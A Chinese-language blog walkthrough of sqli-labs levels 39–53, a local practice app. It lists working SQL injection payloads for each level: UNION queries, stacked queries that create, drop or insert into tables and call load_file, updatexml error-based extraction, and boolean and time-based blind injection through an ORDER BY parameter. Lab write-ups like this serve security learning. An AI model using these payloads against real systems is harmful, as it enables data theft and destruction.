Sqli-lab实验Task3(less39-53)

作者 折戟 日期 2019-04-15
Sqli-lab实验Task3(less39-53)

Sqli-labs实验Task3(less39-53)

Less-39

这个没有闭合的,所以直接使用联合查询:

$ http://127.0.0.1/sqli-labs-master/Less-39/?id=0 union select 1,user(),database() -- #

Less-40

不同的闭合,多尝试几次。

$ http://127.0.0.1/sqli-labs-master/Less-40/?id=0') union select 1,user(),database() -- #

Less-41

和39一样:

$ http://127.0.0.1/sqli-labs-master/Less-41/?id=0 union select 1,user(),database() -- #

但是page-3里的肯定不会这么简单,看了看page-3的标题,这是叠加注入,那就得在搞点其他的测试了,就用less-41来试一试:

$ http://127.0.0.1/sqli-labs-master/Less-41/?id=1;create table test like users;-- #

创建一个和users结构一样的表test。
1.PNG
同理我们可以对表数据进行更新,比如更改用户密码,删除数据库,或者利用load_file函数上传文件,比如php文件。。。

$ http://127.0.0.1/sqli-labs-master/Less-41/?id=1;select load_file('c:/tmpupbbn.php');

Less-42

这里显示的是登陆框,结合这里的叠加注入,我们继续尝试新姿势。
登录框用户名随便填,密码填:

$ a';create table test2 like users; --

创建一个test2的表。
2.PNG
同理,我们可以删除这个表,和之前的操作一样,我们用户名随便填,叠加注入写入相应的语句就行:

$ a';drop table test2 ; --

其他的可以继续尝试。不同的数据库会有不同的语句,有兴趣的可以多学习。

Less-43

这个和上一个差不多,不过post传参的闭合方式为单引号加括号,相应的语句稍微改一改就行。

Less-44

这里和42其实相差不多,只不多这里没有了报错,但是注入语句还是一样的,我们写几个新语句大家看看。
插入数据:

$ a’; insert into users(id,username,password) values ('233','233','233'); --

Less-45

这个也一样,和43的闭合时一样的,单引号加括号,只不过这里是没有报错,会提示说你是一个傻hacker。。。但是我们自己可以去查看数据库发现自己的语句是被执行了的。

Less-46

我们可以看到46的标题变了,现在我们要进行的就是order by的注入测试了,具体什么意思的。就是我们之前的sql语句最后都是limit 0,1。现在是:

$ select * from users order by id;

这时候我们就不能用之前的进行访问了:

$ http://127.0.0.1/sqli-labs-master/Less-46/?sort=1

这个传参就是sort传的就是order by的值,sort=1表示按id排序,看一下:
3.PNG
这就是我们访问上面的url看到的页面,这时候我们就可以考虑考虑如何构造order by的注入语句。Order by后面可以接上面语句呢。
我们可以尝试使用mysql的updatexml的函数来达到注入获取敏感信息的目的:

$ http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and(updatexml(1,concat(0x7e,(select user())),0))

4.PNG
同样我们可以更改updatexml()函数里的第二个参数里的sql语句,来获取我们想要的信息。比如:

$ http://127.0.0.1/sqli-labs-master/Less-46/?sort=5 and(updatexml(1,concat(0x7e,(select email_id from emails limit 0,1)),0))

Less-47

这个一下就猜到加了闭合。。。不要问我为什么,套路熟悉了一下就破了:

$ http://127.0.0.1/sqli-labs-master/Less-47/?sort=1' and(updatexml(1,concat(0x7e,(select email_id from emails limit 0,1)),0)) -- #

Less-48

这个没有报错了,这时候我们就不能用XPATH报错来获取信息了。不过可以使用盲注。
可以利用sort=rand(true/false)进行判断。写一下我们的注入语句:

$ http://127.0.0.1/sqli-labs-master/Less-48/?sort=rand(ascii(left(database(),1))=115)

这是正确的情况:
5.PNG
这是错误的情况:
6.PNG
我们可以根据正确错误的不同返回值来获取信息。
更多关于updatexml的注入可查看:
www.freebuf.com/column/145988.html

Less-49

这一个无论我们输入什么得出的都是一样的,这个时候我们就不能用上面的方法了,不过可以用基于时间的盲注(单引号闭合):

$ http://127.0.0.1/sqli-labs-master/Less-49/?sort=1' and (If(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5)))-- #

Less-50

从这里开始我们就开始新的,order by和叠加注入的挑战

$ http://127.0.0.1/sqli-labs-master/Less-50/?sort=1; insert into users values(1000,”root1”,”root1”)

Less-51

不用猜就知道加了闭合:

$ http://127.0.0.1/sqli-labs-master/Less-51/?sort=1';create table test51 like users; --

7.PNG

Less-52

这个50一样,只是没有报错,payload也一样。

Less-53

这个和51一样,但是没有报错:

$ http://127.0.0.1/sqli-labs-master/Less-53/?sort=1';create table test53 like users; --

快结束了,还有最后page 4,也会在近期写完的。